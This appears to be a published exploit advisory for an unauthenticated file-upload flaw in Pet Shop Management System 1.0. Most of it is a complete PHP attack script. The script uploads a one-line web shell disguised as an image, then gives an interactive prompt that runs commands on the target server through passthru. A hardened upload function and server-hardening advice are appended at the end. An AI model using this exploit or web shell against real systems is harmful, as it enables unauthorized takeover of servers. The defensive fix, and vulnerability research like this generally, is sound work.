# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 28.09.2021
# Author: Mr.Gedik
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html
# Version: 1.0
# https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB

Vulnerable code
controllers/add_petmanagement.php Line 21

- move_uploaded_file($_FILES["images"]["tmp_name"], $_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" . addslashes($_FILES["images"]["name"]));

Exploit
#############

<?php
/* @author:mrgedik */

function anim($msg, $time) {
    $msg = str_split($msg);
    foreach ($msg as $ms) {
        echo $ms;
        usleep($time);
    }
}

anim("____ ______ _ _ |\/| / ____|| (_) | | \/ |_ __| |_______| |_| | __ | |\/| | '__| | |_ |/ _ \/ _` | | |/ / | || | |_ | |__| |__/ (_| | | < |_||_|_(_) \_____|\___|\__,_|_|_|\_\ ", 900);
echo PHP_EOL;

while (1) {
    echo anim("Target (http://example.com/path/): ", 800);
    $target = trim(fgets(STDIN));
    echo PHP_EOL;
    if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {
        echo "Not a valid URL" . PHP_EOL;
    } else {
        break;
    }
}

@unlink("exp.php");
$fw = fopen("exp.php", "a+");
fwrite($fw, '<?php $_POST[m]($_POST[g]); ?>');
fclose($fw);

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $target . "/controllers/add_petmanagement.php");
$fields = [
    'images' => new \CurlFile("exp.php", 'image/png', 'exp.php')
];
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
$response = curl_exec($ch);
@unlink("exp.php");

if (strstr($response, "success")) {
    while (1) {
        echo anim("root@pwn: ", 800);
        $command = trim(fgets(STDIN));
        if ($command == trim("exit")) {
            exit;
        }
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $target . "/uploads/exp.php");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, "m=passthru&g=" . trim($command));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        echo curl_exec($ch);
        curl_close($ch);
    }
} else {
    echo anim("Fail", 800);
}
?>
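The root cause above is that the upload handler keeps the client-supplied filename (so a `.php` name lands in a web-served directory) and never checks the file's content. The following hardened replacement for that call is an added example, not code from the advisory or from the Pet Shop project; the function name `save_pet_image()`, the `UPLOAD_DIR` path and the size limit are assumptions.

```php
<?php
// Added example: hardened replacement for the move_uploaded_file() call in
// controllers/add_petmanagement.php. save_pet_image() and UPLOAD_DIR are
// hypothetical names; adjust the path to the project's real uploads/ folder.

const UPLOAD_DIR = __DIR__ . '/../uploads/';   // assumed location
const MAX_BYTES  = 2 * 1024 * 1024;             // constructed 2 MiB limit

// Allow-list of image types, keyed by the MIME type libmagic reports.
const ALLOWED_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

function save_pet_image(array $file): string
{
    // Reject anything PHP itself flagged (no file, partial upload, too big).
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed, code ' . (int) $file['error']);
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Only accept a path that really came through the HTTP upload mechanism.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // Sniff the type from the bytes; never trust $_FILES['type'] or the
    // client-supplied extension.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']) ?: '';
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('unsupported image type ' . $mime);
    }
    // Server-chosen name: the attacker-controlled filename is discarded
    // entirely, so neither a .php suffix nor a traversal sequence is used.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);   // readable by the web server, never executable
    return $name;         // persist this name, not $_FILES['images']['name']
}

// Usage in the controller (replaces the original line 21):
// $stored = save_pet_image($_FILES['images']);
```

As a second layer, configure the web server so that nothing under `uploads/` is ever handed to the PHP interpreter, so a bypass of the allow-list still cannot become code execution.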